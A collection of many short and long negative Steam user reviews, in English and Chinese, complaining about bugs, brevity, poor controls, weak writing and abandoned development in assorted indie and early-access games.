I was invested in this game when I started playing it, but after a while it got extremely cheesy and unaware of itself. Between all of the joke characters and the really corny ending, this game just really isn't all that good. There's so many more things that could have made it better. Like, why can't we as the player have more of a response than in those letters? Why is there basically no punishment for running out of money? Why is the main characters sanity shown liniarly instead of diegetically through the way he interacts with people? Why is there this unstoppable death cult? The worst thing about it is that the game says the goal isn't to save everyone, but just to 'make you think'. That kinda sounds like ♥♥♥♥♥♥♥♥ to me when the entire point of the game is to save everyone, and the game **punishes** you for not saving everyone, through both the gameplay and the achievements. If there were more to the game than just pressing dioluoge options, I could understand helping people not being the only point. This could have been a game that explores what happens to a man pushed to the edge, trying everything he can to fix everything and save everyone-- without caring for himself. It could have taken a realistic, mature, apropriate look at suicide. But instead, it feels like I'm playing a .exe game off of gamejolt. The worst thing is that this game had soooo much potential, but it feels like a joke after everything is said and done. If you want to play a game that takes a far better aproach to dealing with suicide, try missed messages., or Don't Take This Risk. Those games take suicide 100% seriously, this game just uses it.
This game should be free. I bought it and refunded it after 30 mins of game time played, althought I said I spent a total of 80 mins playing, the other 50 are searching for opponents.
Things I enjoyed: -the stealth parts (which weren't many but enjoyable enoughThings I didn't like:-lack of variety in combat-boring environment-bland storytellingI liked the fact that they chose to introduce a lesser-known legend (especially for people from outside the Netherlands), but I wish they could've done more in terms of gameplay. Even the achievements were hardly motivating.
画质太差 无法操作 根本无法游戏  只能用手柄玩
Potential but seem very unfinished
Meh
最新看法：煞笔设定，只要对方一套你必死 你几套对面都不死的脑残设定，你们对难度的理解就是这个？对面数值碾压主角，主角只有不断猥琐才有可能赢得设定叫高难度？？？？呵呵，等你们什么时候明白玩家希望高难度是敌人的操作 技巧 走位优秀 而不是单纯的数值碾压，你们才能做出好游戏，可惜你们不明白！垃圾！最无语的是只要对面砍中你一下直接就不能动了，连着砍，一套下来必死，而我砍敌人，敌人一直在挨打突然就能霸体反击，为什么玩家就不能有这种设定，高难度难道就意味着敌人拥有各种bug恶心主角没有的设定？你们对不起你们的配音演员！你们对不起你们的配音演员！你们对不起你们的配音演员！头一回觉得声优是A+, 游戏质量是F，这个游戏也算开创先河了Don't buy this one!  The quality of this product is terrible, many people would like to talk about the catastrophic optimisation of this game, but I would rather say the base of game is a disaster as well, poor content with damn system settings, the architecture of this game is ♥♥♥♥♥♥! Someone says this game is cheap, so it's worth. The opinion like this is just hiliarious, they gave this price because they are not able to do a better game with higher price. This is the reason of low price. 你们这游戏做得都配不上配音演员！！！1. 首先开局就搞黄色？？？？？？开发团队品味这么low得吗？？？？就算策划审美有毛病你们这些开发的没点审美？而且这av画质，还比不上前年的神舞幻想，网游水准都不够。这建模也无语，无论是画质还是建模被神舞幻想 古剑三吊打，这还大作呢，过分了吧  本着支持国产的心态，上来就给我泼桶凉水。要是之后的剧情再这么low得话真没救了2. 其次也别跟我说什么Early Access, 你后期再optimize再debug也不可能把建模 画质之类的硬伤改进，除非你把架构reconstruct，这样的话成本不说翻倍吧起码得提升一半，所以根本不可能有太大改进，小bug可以改，但这个游戏的问题在于需要重做的系统机制也好 画面也好，各种大硬伤太多，小error之类的反而无关紧要3.这么渣的画质还卡顿掉帧.......无语了4.也别说什么50块的游戏还能有多高要求，首先3D游戏定这么低的价我想是基于开发者团队水平来定的，你要是团队水平高自然也就定高价，退一万步说说这点钱算个p，你要是做成非常完整不错的一个成品，别说50， 500我都买，游戏不能因为定价而降低它的品质！你们的定价是因为对你们的能力做了妥协，从而影响品质BTW我也是developer，但我不是做游戏的，做ML的，做学术的，想看看国内游戏的开发者到了何等水平，就这样，没救了You really have to recruit more sophisticated pro gaming developers to refine your product!
this is a gdflmdf kmcjx game i hate it so much that why i did this jidfbkhijubgh
Took me 24 min to play it till the end. Too easy and too short. Good for toddlers or really small children.
this game is ass and is all around terrible
There's no AI, the opponent moves its pieces randomly. There are no promotions. Only two sets of tiles (traditional and move patterns), one board, and one sound track.
Want to start the program you just paid for? No so fast, first jump through these hoops which are so bugged that you may never get to the actual program. Congrats devs, it caused a bad review and return.
When I purchased this game, I expected it to be similar in quality to the house flipper game. It is not. It is low poly, terrible texturing as compared to the normal one and props that are shown in the trailers do not appear in the game. They should have worked on VR support for the original rather than make a bad copy.
Drummer here. So far every attempt at providing a drumming experience in VR has been a miserable failure, and this is no exception. There are some serious issues that may not be surmountable. Foot pedals are essential; without feet you can't do much but play the bongos. Precision collision detection is essential - when a stick pixel lightly brushes a cymbal pixel there has to be a reaction, otherwise all sense of presence, interaction and tactility disappears. Velocity and weight must be accounted for, and not just one or two 'settings', but a full range of dynamic force detection that alters not just volume but also the tone and timbre of the instrument struck. Similarly, the different parts of each instrument must make different sounds; hitting the rim of the cymbal and the bell should sound recognizably different.But perhaps most important of all, and the point which makes me doubt the ability of VR to ever simulate drums well, the sticks need to bounce off a reactive surface. Without a surface to work off, most of the technique of drumming is gone - no dragging, no rapid percussion, no way to develop fluid rhythm. Not to mention the strain that constantly arresting your hand movement and drawing it back up (non-drummers might not realize that much of the energy of drumming comes from the force of gravity+rebound); long-term this is a recipe for wrist ligament damage. TLDR: VR drumming is like playing basketball without a floor
gg
It'd be a good game.. If I knew how to work anything...Theres a reason why it's only $5.. There's no tutorials, nothing explaining what to do, and it gets frustrating after 10 minutes of figuring out that you drive with the W and S keys... That's pretty much all I know what to do in this game..I'll be getting myself a refund..
Crappiest game I've ever played on Steam.. I have no idea why it exists, every single thing this developer makes is a cheap garbage for trolling purposes only. - Translation is hilarious and nonsensical. Expect a lot of sentences such as: I don't can't do did when in tomorrow day.There is no option to change languages, even if you know Russian, it won't make any difference.- The only original artwork that exists in this game are the same screenshots that you saw on the game's store page. With the so called character ''Vlad'' walking sideways or the close up of his face. The rest are cheap smudged and blurred images from google. There is an insanely absurd scene where you meet your sister, and at first she stands near the window with short brown hair, and when she turns around she suddenly turns into anime blonde girl with long hair and wears different clothes.. it really cracked me up.- It features amazing endings such as being beaten up by gopniks if you choose to go for bread to the shop, or if you stay at home and turn on your laptop you'll get the blue screen of death. And the game just ends.. that's all. It's a 1-2 min trash game. I feel bad for paying 42 cents on steam sale for this.
This game is a waste of money. I like playing puzzle games that are timed every now and then, but I really enjoy a casual game of mahjong. There should be an option to play casual or normal mode for this game, but you can't unlock all the stages unless you complete puzzles in a certain time. These developers know how to make a fun, casual game into something you delete from your desktop.
No sex scenes for the, well for the entire game since you can't even complete it, there's a box at one stage that you have to move and jump on to but there's two monsters that are always going different directions making it nearly impossible to pass and you can't even get ON the box in the first place.Dying in this game is boring beyond comprehension and just straight up frustrating because nothing actually happens. you just get sent to the menu, there's no system where you have to fight the monster to get it off you like other games like this do, you just get sent to the menu screen. Also climbing ropes is stupidly difficult, most of my deaths were from those dogs where you have to climb the rope to escape from because my character WOULD NOT grab the rope. I've never been so pissed at game that i refund it but this game is so annoying and unplayable that i actually had to.Ps, i feel genuinely bad for the people that wasted any money on this game.
I love the idea of the story. But this "game" has been released as alpha on Steam way to early. There are so many issues that I can't even begin to list them all. I'm a very forgiving person when it comes to indies and alpha releases but the current state of this is unforgivable. All I can say is dev(s) please please please view Extra Credit. I will continue to monitor the development of this game because I so much want to be a little bear discovering the world. Edit: typo
First of all, the person who wrote the Store Page description is one big LIAR! This doesn't look like Crash Bandicoot, Super Mario or Ratchet and Clank at all, in any way. It's a digrace to say this title looks like these awesome games that I grew up with and have all played. This is NOT a platformer, it seems to me like it's just an endless runner for mobile devices with a microtransaction system, that was just removed for the PC edition and compensated by making the game more expensive for PC. I don't even know why there's so many positive reviews for this game? The menu is hard to understand and the sounds are lacking and of bad quality. The only pros for this game is the cartoony graphics, thanks to the Unreal Engine, which look quite good and the lack of a microtransaction system (thank god). Do not waste money on this game, maybe it's fun as a free download for your mobile device, but definitely not for a PC game. Now if you really wanna put something in the description what the game is inspired on, please go for Temple Run, that's the closest it will ever get to.
TL;DR – If this game was free or only a dollar or two it’d get a recommendation. Otherwise, it’s a resounding “Eh.” MAN it's hard to pick a "yes" or "no" for this game since it's such a 5/10, middle of the road, ho-hum experience that it's incredibly difficult to figure out which side I fall on. I've had this game on my wishlist for a while now and now that I've played it I can't lie; I'm a little dissapointed, but not like... THAT dissapointed...For starters, this game wants to be Portal. From the shifting wall panels, to the disembodied voice, to a majority of even the story moments, there's nearly a 1:1 comparison between the two games. There’re surfaces that you can't interact through, there's cubes and spheres you put into receptacles, there's light physics elements, there's switches and buttons that alter the layout of the level. When I finished the game, my first thought was "If literally ONE element of this game was on par with Portal, It'd immediately get a recommendation from me."Here's all the things that are just overwhelmingly decent about this game:The puzzles are too simple, and not quite well designed to be considered excellent. They're alright, but for a puzzle game, that's a pretty big deal breaker. I never felt like I had a real eureka moment that you often get from figuring out a clever puzzle. Looking back, none of them needed to be in VR, and nearly always took place on a 2D plane.The dialogue isn't necessarily funny or quippy, and certainly isn't quotable. I think they're trying to emulate Cave Johnson, with the rampant apathetic boss who doesn't really know what's going on, but there's not enough personality to make anything come through. Every line of dialogue wound up being just a throwaway line. I can quote every line of Portal 1+2 from memory, and I can't remember a single thing that was said throughout this game. On the subject of dialogue, the voice actor's performance isn't strong enough on it’s own to sell the only okay writing either. Again, not nearly enough personality. Think along the lines of listening to a worn-out tour guide, but on a good day for them.There's just a hint of worldbuilding, with some lines of dialogue being devoted to expanding the world, how the psychic powers work, and so on, but it's so short and inconsequential that it might as well not have been there at all, but at the same time it's nice to have.The graphics are relatively bland, you're in an office building throughout the whole experience, but they're not awful by any means. Serviceable but not particularly stylized.The controls work around 75% of the time, the other 25% is buggy and just not all the way there. You have to have unreal patience for certain sections. Since this is a physics puzzle game, incorrect solutions were a coin flip on whether or not it was just a physics bug or a controls hiccup. Even worse was one time when I had a box in a receptacle, it didn't register. When I went to fix it, the box fell out onto the ground and I had to redo the puzzle all over again. I believe that the culprit is the desk you sit behind, which blocks your "sightline" to interactable objects which will interrupt your psychic powers. If the desk wasn't there for roughly half the tests, the controls would be fixed, though I'll admit I might not have set the sitting position correctly. Sit higher than you would when setting up the seated position.It's about an hour long, no matter how you slice it. I beat it in around 50 minutes, but other reviews give it an hour and a half. Regardless, it's just long enough that I feel like the price is reasonable, but longer than I'd want for this kind of game, given concept and execution and scope. This is just a touch longer than the length of a VR game that I would want to give to someone who's new to VR games and is looking for a short puzzle game to try.The worse part about all of this is how if literally a single one of those problems were fixed, either the puzzles, the writing, the voice acting, the graphics, or the controls, the game would be so easy to recommend. It's cheap, it's short, it'd be a no brainer. But as it stands right now, it misses the mark by the absolute  smallest  amount. It's so close to being pleasant but flawed, quirky and decent, but it's so average on every front, the only way I could recommend this game is if it were free, or at the very least a buck or two. At it's full price of $9, as much as it probably pains the devs to read this, it's just too much for the completely and utterly average game you're getting.  That being said, I really do look forward to what the next VR game the developers put out. They're SO close to having the next little VR indie hit that I really think they could pull it off.
The art style of this game is very pleasing to the eye. The pixlated animations are beautiful and the game is very "cute." However, with the game in its current state I can't really recommend it. There is no explanation of the level up system in game. When jumping in the game it's very hit or miss quite a bit of the time. Also, the story is very hard to follow. Some girl in transported into another world and now has to fight stuff? It's hard for me to follow. But maybe that's all a part of the plan. I will keep looking out for updates on the game and I hope that it develops into something great. Another critique I have is that the english isn't spot on. There are a lot of gramatical errors. Normally, I wouldn't mind this, but a few of the dialogues in game were hard to comprehend.
The game isn't abandoned, it just hasn't been updated in 4 years.What a ♥♥♥♥♥♥♥ joke for £4.20, you can get a few minutes of entertainment then that's it.
No instructions given. Not so convenient to use tools. Poorer game experience than the car mechanic simulator 2018
What the hell after the 5 day of play ths game it stop work ? gogg they I got it for $2 or I be mad as hell
this game is very short. I'm pretty sure their was less then 30 puzzles but once it ended I said to myself thats it?? I took me a little under an hour and a half to finish. In my opinion not worth the time
Poor game because of no difficulty settings.
Well, i'm very disappointed that i paid 10 dollars for this game that feels like a proof-of-concept with end-of-project story cutscenes.The pros:-Extremely fun gameplay loop. It's simple but it works really well-Very funny cutscenes and writing, great voice acting.-Aesthetics are on-point. Looks really nice all around and has great music.The cons:-Gameplay changes are drip fed at an absolutely ludicrously slow speed and are definitely not deep enough.-Only 1 gameplay class. Tons of skins but ultimately, the first 10 minutes or gameplay and the last 10 minutes of gameplay are going to be identical.-Base-building that does not unlock any new gameplay mechanics. It feels like the only thing i get out of building new upgrades is seeing the story move forward. Big let-down.-low number of bosses. i counted 5 in 6 hours of play.-Literally no increase in complexity or depth of gameplay.-Runs are simply too easy. It's trivial to succeed in a run and, while it's not always bad to not be incredibly challenging, the challenge level simply isn't up to snuff.Honestly, i'm considering learning C# and making my own spin on this game. That's how disappointed i am.
The game is designed poorly, becomes unplayable. got to chapter 2, and when trying to open things or solve puzzles, a single left click would at points take you back to the starting room. don't waste the free space on your PC.REFUND REQUESTED!
This game has no midway saving mechanism, and the fault tolerance rate is almost zero. The more you play later, you must fix one mistake at every step. Otherwise, you will fail and need to start again. I don't recommend this game. Garbage has hurt my feelings.
been playing for a bit and objects apparently are too small so you will dismiss them, devs should highlight the objects which are farmable or where you can get resources. I know it is a survival game but i used a pickaxe on a rock and it did nothing. On trees i used the axe and nothing happen on some trees and on some it will made the sound. Game needs more work.
This game is forever stuck in my played games
This should have never been released for PC. It is meant to be played on a smartphone or tablet. There is no way you can successfully complete all the levels with your mouse. You are just not fast enough. You’d need a touch screen for that. Moreover, achievements are bugged and there is no support anymore.
game is too small i only played and finished the game in 3 hour.....it is not worth money
If you are looking for a casual game, turn back, this game it's not that fun.
eh
Its buggy and the controls are horrible
Could never get past the menu screen on my vive. Is anyone going to fix this?
cant get it to load, anybody elose?
Kind of boring, nothing special. Logic of some puzzles is a bit cryptic.
Sadly, part of what makes a game is the support, and this game has none. Repeated request by multiple users to fix bugs assosiated with starting the game have gone entirely ignored. I would love to give a good review here, but an ignored and frankly unplayable game can't get that. Fair warning, try this the moment you buy it and be prepared to demand a refund.Nothing against the game, just a developer who can't be bothered to fix it.Note: I've actually heard good things from those few whom get it to work...
this is crap af
[Edit 7/1/18]New levels are always good, and the picross mode definitely helps. I also appreciate the night mode (black background, white objects).It's getting there, on its way to becoming a pretty good casual game. ALMOST there.I will admit that it might be worth the price if you really enjoy these kinds of puzzles. I'm switching the review to "worth it," with the caveat/reminder that it is a short game, but mad props to the devs for continuing development. With more content in the works, it can only get better.Though now that I try to change the recommendation, the system is telling me "Changing your review to 'Recommended' will clear all the ratings by other users. Are you sure you want to do this?"This freaks me out a bit. Any help on how to do this?[Original]Interesting concept for a game, definitely bends and stretches the mind a bit. Probably beneficial for school-age kids who need to strengthen pattern-recognition skills. Enjoyable, until suddenly I had completed all 60 puzzles. I've played a whopping 5 hours total. I didn't even rush. $5? A bit much for only 5 hours.Player recommendation: Save your money. Wait until this goes on sale.Developer recommendation: Periodically add new puzzles (and say that you do, keep players wanting to come back). And I saw someone else mention (and I agree), make the different height levels more distinguishable by sight. Sometimes it's difficult to see where exactly I'm aiming a new block.Overall recommendation: No... (but a big YES! when it's cheaper)[Another edit](and to commenter DiMono, I don't go to the movies, it's plain to expensive. Netflix is much cheaper, and I somewhat balk even at that expense. On the rare occasion I do see one in the theater, I wait until it goes to a cheap-seat theater and I don't bother with salt-lick snacks unless under $3. -- what can I say, I try to be conservative with my money.)
At first I was thought that it was cute and it would be a clever game... and innovative of course – not in a brilliant way, but enough to hook me.After a few engaging puzzles, came more and more those relying mostly on execution... We know that, in principle, the epiphany of finding the solution to a puzzle should be its climax; the remaining execution has to not come in the way, or should be fun to play. However here it doesn't happen this way. OK, why not, all action-puzzle games also rely on execution. But in Semblance, with sometimes unreliable controls (due to the deforming geometry, I get it is somewhat a problem inherent to the concept) executing the solution of the puzzle becomes a tedious struggle. Here it's not the core concept that is at fault, but rather some questionable additional mechanics and level design – like the slingshot mechanic, which strength depends on some weird tension rule.I did give this game a chance, I really wanted to enjoy it and see the end credits. Alas, on the second main tree, after too many "slingshot puzzles" that relied solely on (frustrating) execution, I gave up.
Glitches or doesn't even load
I know I should not complain about the game which cost only £0.70, but do not waste your 70p on this. The game is just the bad clone of Poly Runner VR. Play that insted. It is much nicer, easier to control and it is free.
Even if you have a powerful PC, it will still be problematic to try and play, it just never loads correctly. It COULD be fun, but it is just horribly formatted to run on any device other than the developers. I wish I could be positive, but I really can't.
For me it's too late to get a refund, but hopefully you won't have to get a refund because you won't buy the game in the first place. In the game's current state there's not much to do, and the last update was MANY MONTHS AGO! It may be in early access, but at this point I wonder if they're even working on the game at all. This is the first time I've ever given a bad review, but I hope it helps.
Its a very very *weird* game
Got this on a sale and was expecting more fun from it. After all, Worms games are always fun and I also really enjoy good pinball games. However, this game simply didn't make me want to spend time playing it, it didn't catch on like David's Midnight Magic or Mechanicus. And no, you don't find those games on Steam, because they are old C64 games - and very addictive. It's a shame no-one can develop an entertaining pinball game for PC...
It's way too boring for me...Sorry guys.I'd wanted more  SEX scenes :) .
An option to stop the music will be great! There is one and only one simple melody but after 7 levels non stop I just wanted to shot myself
Fun but way too short. Completed in 5 minutes... This means the game costs 48€ per hour of entertainment :(
GOT ROBBED ....DOESN'T WORK PAST DRAFT .....SAD PEOPLE DO THIS TO OTHERS
full of  errors
Eternal Card Game initially comes across as being quite a solid redo of Magic the Gathering. It has some very interesting mechanics that build upon previous concepts from other card games, and has made some effort to reduce the common issue of variance. Eternal uses a number of mechanics seen in MtG and hearthstone (such as trample, flying, death-touch etc), as well as a very similar mana system and turn structure. Eternal moves on from there though with a slightly different take on hearthstones weapon system, and some interesting mechanics that make good use of the digital format.Unfortunately I cannot recommend this game, and instead recommend 'Magic Duels' instead. There are some flaws that hinder Eternals current potential, and 'Magic Duels' is simply a more balanced and newcomer-friendly environment. To explain, I will list the pros and cons below.Pros:- Eternal makes good use of being a digital card game. There are a number of mechanics and unique card abilities (namely 'echo' and 'crown of possibilities') that are fun, reasonably powerful, and also very difficult to replicate in a paper format.- Eternal is somewhat balanced. Some cards are great, some are not, and no cards (from what I have seen at any rate) are game-breakingly poweful. Ranked (Standard) definitely has tiered deck lists (ie, some decks are better than others), but budget or janky decks can still participate with an expectation to pull off a few wins- Eternal is free to play, paying simply speeds up the process. All formats can be played with the in-game currency (gold), and all of the cards can be obtained through earning and using gold. Gold is also not too difficult to obtain, as you can complete quests, battle players, or battle AI to earn gold. Participating in drafts or sealed formats also awards gold and cards/packs, and doing well in draft will either cover the entire cost (winning 6 games and losing 3) or will earn more gold than what you paid (7 wins, 2 or fewer losses)- Eternal is reasonably solid with very few bugs or systematic issues. It doesn't play well with certain GFX settings or GFX cards, but the only real issue I encountered was that certain parts of the UI might black out (while still being usable).Cons:- Biggest first: variance. A lot of people will say "variance is in all card games, it's part of the game", and I will agree with them. However, when playing Eternal in any of its formats, there are far too many "non-games" - games where you have drawn too many sigils (lands), or too few, or are missing a colour entirely; games where you have drawn poorly and/or the opponent has drawn perfectly; games that are not really games, because either you, or your opponent, did not really participate.Eternal is very much a 'value' game rather than a 'combo' game, 2-for-1'ing your opponent is always what you play to, and often what you lose to. While out-valuing your opponent can be fun, often a single 'out-value' moment can snowball into victory. Why? Deck size requirements are too high (45 for sealed, 75 for draft), you can only mulligan once, and games are a 'best of 1', which means that consistency is regularly quite low. With this, even the best decks can easily lose repeatedly to lower tier decks, even if the match-up is favourable.Also, this issue of variance practically doubles in draft. The limited format is decent, and the card design makes it clear that MtG professionals have assisted with creating the set. However, the drafting stage takes place with AI bots (draft with bots, play against live players), and the AI often make strange choices that lead into odd drafting signals. Packs also have extremely poor variance, often only containing one card of a particular colour. Due to this, it's quite often that you will be passed a pack where there are literally no good picks for your colour(s) (even at pick 2), and even pack-1-pick-1 can be extremely poor. These issues exacerbate the previously mentioned variance issues, often leading to a bad draft experience.In all, there are an alarmingly high number of "non-game"s, and be rare to experience actual games. Non-games are less likely in ranked, but even then the rate seems (purely based on experience, not at all researched) to be approximately 50-50.- Eternal is not newcomer friendly. There is a tutorial, and you do get to play a relatively easy and straightforward campaign. 'Forge' (sealed) is also relatively easy, and can be a good way for new players to spend gold and learn pick order basics. However, there are a few mechanics that are not explained well, and a number of interactions that are not particularly intuitive. Good examples of this are 'Aegis' and 'Exhaust', as neither are explained fully by the in-game rules description. Thankfully this issue isn't too uncommon, but (without some prior research) you will likely lose a few games (some of which you may have paid for, like draft) due to not fully understanding a particular mechanic.- Certain cards and mechanics are unbalanced. Anything that provides card advantage, and any mechanic that provides an easy and/or immediate 2-for-1 (eg. warcry and echo) are notably more powerful than other effects. While this would be fine normally (as you do need certain cards/effects to be pushed), the issue of consistency and variance makes this a bit more unbalanced. I did say earlier that Eternal is "somewhat balanced" as a 'pro', and overall the game is good in that regard. The colours all do fine in limited, and nothing is game-breakingly powerful. However, you will experience more 'non-game's the moment you don't run some form of deck-thinning/card advantage/inherent 2-for-1s, as variance will simply punish you more often. To conclude, variance is painful, and "non-game"s are the worst. The game is fun in a lot of ways, but sadly the sheer number of "non-game"s detract a little too much from the overall experience. The game is still in development, and it still holds a lot of potential, and hopefully the developers will work toward some better solutions for the current issues. For now though, I suggest finding another game.
This story has very simplistic writing, which can be a pro or a con depending on what you're looking for in your reading. However, the bigger problem is that there's no charm in the storytelling. I've read many fics that weren't skillfully written but were still compelling because of other things like vivid imagery, and endearing characterizations. Those are some things this story is severely lacking in. I'll detail what I did and didn't like, but be warned that there are spoilers. Pros:  The simplicity of the writing DOES make it accessible to people of all reading levels and to readers beyond sci-fi fans. There aren't many confusing science-y words to look up, if any, making it easy to understand the story. There are some genuinely nice and/or wholesome interactions with other characters. I especially liked the MCs conversations with the sassy AI and interactions with the Were people. This story provides LGBTQ+ representation.  Cons:  This could've used more drafts. There are some errors that could've been prevented with more editing and revising. One of the big ones I've seen is two characters speaking in the same paragraph when the bits of dialogue should have been separated as dialogue should be. With no achievements involved, there are no incentives offered to replay this game to see what other routes are like. The process of viewing your relationship stats is complete ass. You can only view ONE character's progress bar at a time, and every time you'd like to look at your progress meter with the companions, you have to do (Show stats + Relationships + Character relationships + Choose character). So much unnecessary clicking and wasted a lot of time. It would've been nice to see all of the bars for the characters laid out together in the same place instead. Characterization for the companions is awful. Even the side characters in the locations you visit are more interesting than the people who accompany you on your journey.  For example, Yelena doesn't seem to have any traits other than quiet and nice.  This also unfortunately means that the romances are weak.  There is just no way that Emil can go from huge assh*le to suddenly calling you "dear" in front of everyone and deeply in love with you to the point where he genuinely has to consider choosing between you and his father. It's such a short period of time, not enough for this to be believable.  Building off of the point about characterization, the characters have no growth between interactions. The biggest examples that I have played through are Emil and Larua. Starting with Emil, the only way to progress your relationship with him for the first half of the story is to keep taking his insults I guess?? You can't pick the options that confront him about his poor treatment of you. In the beginning of the game, at your very own birthday party, you'll have to act polite with him instead of asking him what he gets out of being awful to you in order to unlock dialogue options that will allow for your friendship to improve (or your romance to be possible). Another instance is when you choose to walk away after he insults you, it decreases your friendship level by at least 3%. This is frustrating for people who play the game and want to pursue a male/male romance because if you play as a Wispy or a Wanderer, this verbally abusive douchebag is the only option. And nearing the end of the story, if you choose to be romantically involved with him, all he does is pass off his poor behavior towards you as his "weak attempts at humor." Sorry, but that's not enough. Where's his motivation? Where's his depth? Give me a believable reason as to why he's acted the way he has towards the MC. Build up characters' insecurities throughout the story, allude to the key events that shaped them as a person, etc. Similarly with Larua, you as the MC can propose ideas or pose questions that challenge her way of thinking. But while it doesn't drop your relationship level with her, she is so condescending and toxic in the way she responds to you. This happened at least twice, where I wouldn't just agree with her and she would tear the MC down for it, and there is no change in behavior between the 1st instance and the 2nd. And after each occurrence, she acts like we didn't just have a negative interaction and proceeds to be super friendly. No apology, no acknowledgement of the argument. It's like they never happened. But to top it off, she storms away every time the conversation doesn't go her way. And get this, if you choose to go to the sand dunes for your first location, telling her that she's saying such sanctimonious bullsh*t launches her into a rage and she says "well at least I don't go around insulting people who are trying to do good!!" AS IF SHE DOESN'T GO FOR YOUR THROAT FIRST AND BERATES YOU HARD OUTSIDE OF CHOOSING THE SAND DUNES AS YOUR FIRST LOCATION, JUST BECAUSE YOU OFFER A DIFFERENT PERSPECTIVE. My god, I've never seen a story lack continuity so badly. It made me want to completely stop interacting with the character, and in my later replays to explore other routes, I had to pick another race even though the Wispies were my favorite because I couldn't stand to have such a huge b*tch in the group. Her outbursts initially make sense because the Wispies are supposed to be very emotional by nature, but the problem is that there's no aftermath to them. The fact that you can't confront your companions about their terrible behavior or stand up for yourself without being penalized is just so annoying.  The lack of continuity is so detrimental to the story.While I can't say this story is good, I won't say no to trying out another one from this author if they put out another text-based game in the future. Each piece is a learning opportunity, and I'm sure the author can improve a lot from this experience. I can see the potential, and I believe this could've been very different after more rounds of editing and revising.
Had this on my wishlist for ages and am really disappointed with the product in its current state. No AI, no online multiplayer.Please add those functions and I will really enjoy this game!
You can not change the direction the ball is going ever. Sometimes you destroy all the blocks and it will not register so you are left bouncing the ball for the rest of your life.
not worth the money.. u just press the D pad and try not to get hit by the letters... found better games on facebook!!!
Lest anyone misunderstand me, this is Not A Bad Game.I’m not recommending it at this time (as of Sept. 27 patch) because the current game content does not justify the price. Let me explain...EDIT: Updated through summer 2016. See bottom of main text for details.-----------------------------The game starts by having you select some cosmetics and gear for your captain and crew. You then enter a staged tutorial battle where you learn the basics of shooting and moving your crew around the ship. You’re moved to your home port to begin the actual game. Here you hire some crew and outfit your first ship to begin your journey.Upon leaving port you can sail around a grid-type world map. You have instructions to head north and begin fighting. In truth, there’s really nothing else you could do (that giant squid beast you spawn next to is just eye candy) so you’ll head north a few spots and pick a battle location.You’re given 10 seconds to allocate all of your crew (roughly 10 men). This is woefully inadequate and you’ll likely be at least 20 seconds into fighting before you’re satisfied with everyone being in their spot. Now it’s finally time to use those guns you were promised in the title. There will be three types of enemies: small fighters, medium gunships and heavy gunships. They will attack you with a combination of bombs, machine guns and paratroopers. Your primary job is just to aim the guns so as to compensate for your target’s relative velocity and the bullet drop. Pew Pew Pew at the enemy for a few seconds and they explode quite satisfactorally. Do this well enough and you’ll hopefully survive the battle.If you survive the battle, you’ll be rewarded with gold for your total number kills. If you're destroyed, you are sent back to home port (without losing anything) and can continue from there. Eventually you rack up enough gold to buy better guns and a bigger ship. The new equipment is roughly the same as what you had before with better stats (more guns / more damage / more armor / more health). Now you’d expect the enemies would scale up as well. They don’t. You’ll be fighting the same fighters and gunships through another 20 to 30 battles in roughly the same numbers as the first battle you fought. There aren’t any bosses or different game modes. You’ve reached the end of the current content. It’s a rather hollow feeling. (Note: there is technically an alien thing called “orbs” which you can battle, but they appear to be impossible to kill in the current game, which means it’s just a “You Lose” screen by another name.)Summary:So that’s why I’m not recommending it at the moment. There’s very little game here to recommend. The mechanics of it are sound, it runs decently well and it certainly has potential, but you’re buying a 2 hour demo of a good game, which is not worth $13 USD. If there’s significant content added in an upcoming patch, I’d happily change my vote.-------------------------Updates:Halloween 2015: Added two guns and a new ship. Equipment too powerful for existing enemiesNov. 8th: Port Siege mode added. A 3 to 6 minute 2D turret sequence with clunky WASD-based controls and excessive dirty lense effects. Not fun.Dec. 1st: A few quality of life and partial price balancing changes.Christmas: Two new guns, two new reinforcement chips, one new ship. Equipment too powerful for existing enemies.--------------------------------------------------August 2016Final Update(?):It's been over 7 months since the last time I could bring myself to mess with this shell of a game. Unfortunately, it seems the developers had a similar idea with no updates or forum contact in the last 4 months. The developers still exist. They announced a new game coming out only a week ago, but -this project appears abandoned-. Please do not buy it.If you want my personal recommendation, take a look at Airships: Conquer the Skies.It has some similarities to All-Guns (early access, 2D customized ship battles, campaign map), but better in almost every single way: lower price, more content, fewer bugs, regular updates, mod/workshop support, multiplayer, as well as an active and engaging developer. 
I was looking forward to this game, but it is quite disappointing. first of all, the game's soundtrack is NOT procedural. It only has a few notes that it plays one after the other, in no rhythm or sequence whatsoever. If you look in the game's files in your SteamApps directory, you will see that the game only used 5 different notes, each one playing after the other. I guess the game's creator does not know the meaning of procedural. This is more like play a random note after the other, from the 5 notes all together.The basic gameplay is just to move the mouse around, avoiding really slow lines that appear across the screen. Nothing challenging. They game does change into retro graphics as you play, which is sort of cool. I feel bad giving a fellow indie developer a bad review, but this is not worth the small price of this game. Looks like it could have much potential, but right now its not even an enjoyable experience.
A prehistoric file navigation system with synchronous thumbnail generation that blocks user-input on the user-interface for around 5-10 seconds EVERYTIME that you scroll up or down a page while navigating through the image collection. In other words, everytime that you scroll up or down a page to navigate trough your collection of custom added images, you need to wait around 5-10 seconds for the game to finish the thumbnail generation of every image in the current page, and only then you can continue scrolling up or down to the next page...The worst thing is that generated thumbnails are not saved anywhere locally, so everytime that you scroll up and down a page, new thumbnails need to be generated even for the pages that you already loaded before. This annoying behavior is a pain if you plan to add lets say 100 custom images or more, in that case run away from this game because that kind of annoying navigation its not worth it even for less than 1€.
This is a really bad game. Not only is there no attempt to have any sort of historical realism, but the scenarios are hopelessly unbalanced and there's no difficulty setting. Winning a scenario on the first try is simply impossible and even on the twentieth try is still ridiculously difficult.  This is the classic game "Battleship's" mutant child and it's really ugly.
Bad game at its current state, will elaborate if needed, but it is essentially a crappy tower defense.
谢谢你们的屎
Not even ironically enjoyable.
Sorry, but this game is unplayable on win8.1/64. Lots of bugs and no updates. Looks like fun tobad it isn't finished.For me it was 6 bucks wastedDave
